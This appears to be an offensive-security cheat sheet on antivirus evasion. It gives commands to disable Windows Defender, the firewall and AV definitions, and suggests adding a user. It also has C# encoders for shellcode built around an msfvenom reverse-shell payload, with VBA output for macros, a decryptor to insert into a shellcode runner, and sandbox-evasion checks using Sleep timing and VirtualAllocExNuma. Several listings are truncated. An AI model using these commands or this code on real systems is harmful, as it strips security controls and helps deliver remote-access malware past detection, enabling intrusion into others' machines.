Evasions
Remember to use x64 shellcode and build the binary for x64.
Disable AV (admin)
A GUI session (RDP, port 3389) with admin access may be needed to turn off other AV products (e.g. AVG).
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring " /t REG_DWORD /d 1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring " /t REG_DWORD /d 1 /f
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose
netsh Advfirewall set allprofiles state off
cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all
We may add a new user for easier system access.
Shellcode Encryption
Encryptor
helper.exe
using System;
using System.Text;
namespace Helper
{
    /// <summary>
    /// Console tool for the "add 2" encoding: each input byte is incremented by two
    /// (wrapping at 0xFF) and the result is printed as a comma-separated list of C#
    /// byte literals. The inverse "subtract 2" loop is the one listed under "Decryptor".
    /// </summary>
    internal class Program
    {
        static void Main(string[] args)
        {
            // NOTE(review): the beginning of the `byte[] buf = new byte[...] {` declaration is
            // missing from this listing; only the tail of the initializer survived. The loop
            // below reads `buf` as that array.
            0xfc,0x48,0x83,0xe4,0xf0};
            byte[] encoded = new byte[buf.Length];
            for (int i = 0; i < buf.Length; i++)
            {
                // Widen to uint before adding so the sum cannot overflow, then mask back to one byte.
                encoded[i] = (byte)(((uint)buf[i] + 2) & 0xFF);
            }
            // Two lowercase hex digits per byte, with a trailing ", " after every item (including the last).
            StringBuilder hex = new StringBuilder(encoded.Length * 2);
            foreach (byte b in encoded)
            {
                hex.AppendFormat("0x{0:x2}, ", b);
            }
            Console.WriteLine("The payload is: " + hex.ToString());
        }
    }
}
alt
using System;
using System.Text;
namespace xorer
{
    /// <summary>
    /// Console tool that XORs every byte of <c>buf</c> with a fixed key and prints the
    /// result either as a C# <c>byte[]</c> initializer (default) or, with <c>-VBA</c>, as a
    /// decimal list with VBA line continuations. The key used is echoed in the output
    /// header so the matching decode loop (commented out at the bottom) can be filled in.
    /// </summary>
    public class Program
    {
        public static void Main(string[] args)
        {
            // msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 EXITFUNC=thread -f csharp
            // NOTE(review): only the first and last bytes of the 324-byte array appear in this
            // listing; the initializer is elided and will not compile as shown.
            byte[] buf = new byte[324] {0xfc,0xe8,0x82,0x00,0x00,0x00,
            0x6f,0x6a,0x00,0x53,0xff,0xd5};
            int key = 169;
            // Encode the payload with XOR: each byte is XORed with `key` and truncated back to a byte.
            byte[] encoded = new byte[buf.Length];
            for (int i = 0; i < buf.Length; i++)
            {
                encoded[i] = (byte)((uint)buf[i] ^ key);
            }
            StringBuilder hex;
            if (args.Length > 0)
            {
                switch (args[0])
                {
                    case "-VBA":
                        // Printout VBA payload: decimal values, 50 per line, each line ended with the
                        // VBA continuation character "_" followed by a newline.
                        uint counter = 0;
                        hex = new StringBuilder(encoded.Length * 2);
                        foreach (byte b in encoded)
                        {
                            hex.AppendFormat("{0:D}, ", b);
                            counter++;
                            if (counter % 50 == 0)
                            {
                                hex.AppendFormat("_{0}", Environment.NewLine);
                            }
                        }
                        Console.WriteLine($"XORed VBA payload (key: {key}):");
                        Console.WriteLine(hex.ToString());
                        break;
                    default:
                        // Any other argument is rejected with a usage hint; nothing is printed for the payload.
                        Console.WriteLine("Accepted arguments: -VBA to print VBA payload instead of C#");
                        break;
                }
            }
            else
            {
                // Printout C# payload: "0x.." literals, 15 per line, no comma after the final item,
                // wrapped in a `byte[] buf = new byte[N] { ... };` declaration of the same length.
                hex = new StringBuilder(encoded.Length * 2);
                int totalCount = encoded.Length;
                for (int count = 0; count < totalCount; count++)
                {
                    byte b = encoded[count];
                    if ((count + 1) == totalCount) // Don't append a comma for the last item
                    {
                        hex.AppendFormat("0x{0:x2}", b);
                    }
                    else
                    {
                        hex.AppendFormat("0x{0:x2}, ", b);
                    }
                    if ((count + 1) % 15 == 0)
                    {
                        hex.Append("\n");
                    }
                }
                Console.WriteLine($"XORed C# payload (key: {key}):");
                Console.WriteLine($"byte[] buf = new byte[{buf.Length}] {{\n{hex}\n}};");
            }
            // Decode the XOR payload (template for the consumer; XOR with the same key restores the bytes)
            /*
            for (int i = 0; i < buf.Length; i++)
            {
            buf[i] = (byte)((uint)buf[i] ^ {key}); // replace {key} with key value
            }
            */
            // VBA equivalent of the decode loop
            /*
            For i = 0 To UBound(buf)
            buf(i) = buf(i) XOR {key} // replace {key} with key value
            Next i
            */
        }
    }
}
Decryptor
insert into the shellcode runner
// Inverse of the helper.exe "add 2" encoder: subtract 2 from each byte of `buf` in place.
// uint arithmetic plus the 0xFF mask makes values 0x00/0x01 wrap to 0xFE/0xFF instead of throwing.
for(int i = 0; i < buf.Length; i++)
{
    buf[i] = (byte)(((uint)buf[i] - 2) & 0xFF);
}
Bypass heuristics scan
Sleep
insert before shellcode runs
// P/Invoke declaration for the Win32 kernel32 Sleep (milliseconds).
[DllImport("kernel32.dll")]
static extern void Sleep(uint dwMilliseconds);
static void Main(string[] args)
{
    // Measure the wall-clock time that actually elapses across a 2000 ms Sleep and
    // leave Main early if less than 1.5 s passed. Uses DateTime.Now; only the
    // difference is used, so local time vs UTC does not matter here.
    DateTime t1 = DateTime.Now;
    Sleep(2000);
    double t2 = DateTime.Now.Subtract(t1).TotalSeconds;
    if(t2 < 1.5)
    {
        return;
    }
    // NOTE(review): this fragment does not close Main; the rest of the method follows in the target file.
Non-emulated APIs
insert before shellcode runs
// P/Invoke declarations for kernel32 VirtualAllocExNuma and GetCurrentProcess.
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress,
uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);
[DllImport("kernel32.dll")]
static extern IntPtr GetCurrentProcess();
// Single 0x1000-byte allocation in the current process: 0x3000 = MEM_COMMIT | MEM_RESERVE,
// 0x4 = PAGE_READWRITE, preferred NUMA node 0. The returned pointer is only used by the
// check below; it is never written to or freed in this fragment.
IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
if(mem == null)
{
    return;
}